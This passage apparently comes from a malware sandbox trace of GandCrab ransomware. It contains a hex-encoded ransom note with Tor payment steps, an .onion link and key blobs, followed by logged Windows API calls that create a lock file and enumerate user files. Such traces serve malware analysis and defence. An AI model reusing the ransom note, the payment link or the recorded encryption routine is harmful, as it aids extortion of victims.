x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0073.947] WriteFile (in: hFile=0x2cc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259e824, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259e824*=0x2162, lpOverlapped=0x0) returned 1 [0073.948] CloseHandle (hObject=0x2cc) returned 1 [0073.948] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.948] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.948] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x13, wMilliseconds=0x106)) [0073.949] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0073.949] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0073.949] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0073.949] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\d2ca4a09d2ca4deb61a.lock") returned 97 [0073.949] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2cc [0073.950] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.950] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.950] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\") returned 73 [0073.950] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\*" [0073.950] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\*", fInfoLevelId=0x1, lpFindFileData=0x259e840, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259e840) returned 0x503638 [0073.950] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.950] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0073.951] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.951] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.951] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0073.951] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0073.951] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0073.951] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: 